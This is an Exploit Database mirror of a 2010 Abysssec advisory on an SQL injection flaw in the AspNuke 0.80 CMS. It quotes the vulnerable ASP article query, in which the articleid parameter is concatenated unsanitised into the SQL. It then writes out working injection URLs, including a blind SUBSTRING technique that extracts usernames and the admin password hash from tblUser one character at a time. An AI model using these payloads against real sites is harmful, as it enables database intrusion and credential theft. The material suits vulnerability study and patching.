ASP Nuke – SQL Injection

• Exploit Database
• 128 阅读

• 作者： Abysssec
  日期： 2010-09-11
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/14969/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  &apos;&apos;&apos; ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/   http://www.exploit-db.com/moaub11-asp-nuke-sql-injection-vulnerability/ &apos;&apos;&apos;   Abysssec Inc Public Advisory Title:ASP Nuke Sql Injection Vulnerability Affected Version :AspNuke 0.80 Discovery:www.abysssec.com Vendor :http://www.aspnuke.com     Download Links :http://sourceforge.net/projects/aspnukecms/   Description : ===========================================================================================   1)- SQl Injection This version of ASP Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.     Valnerable Codein .../module/article/article/article.asp:   Ln 37: sStat = "SELECT art.ArticleID, art.Title, art.ArticleBody, " &_ " auth.FirstName, auth.LastName, " &_ " cat.CategoryName, art.CommentCount, " &_ " art.Created " &_ "FROM tblArticle art " &_ "INNER JOIN tblArticleAuthor auth ON art.AuthorID = auth.AuthorID " &_ "INNER JOIN tblArticleToCategory atc ON atc.ArticleID = art.ArticleID " &_ "INNER JOIN tblArticleCategory cat ON atc.CategoryID = cat.CategoryID " &_ "WHERE art.ArticleID = " & steForm("articleid") & " " &_ "AND art.Active <> 0 " &_ "AND art.Archive = 0"     Considering to the code, you can browse these URLs: http://www.site.com/module/article/article/article.asp?articleid=7&apos; (the false Query will be shown) http://www.site.com/module/article/article/article.asp?articleid=7+and+&apos;a&apos;=&apos;a&apos;--(this Query is alwaystrue)   with the following URL you can find the first character of Username: http://www.site.com/module/article/article/article.asp?articleid=7+and+&apos;a&apos;=(select+SUBSTRING(Username,1,1)+from+tblUser)-- and second character: http://www.site.com/module/article/article/article.asp?articleid=7+and+&apos;a&apos;=(select+SUBSTRING(Username,2,1)+from+tblUser)-- and so on. So you gain Admin&apos;s information like this: Username : admin Password : (sha256 hash)     Which the Password was encrypted by SHA algorithm using .../lib/sha256.asp file.     ===========================================================================================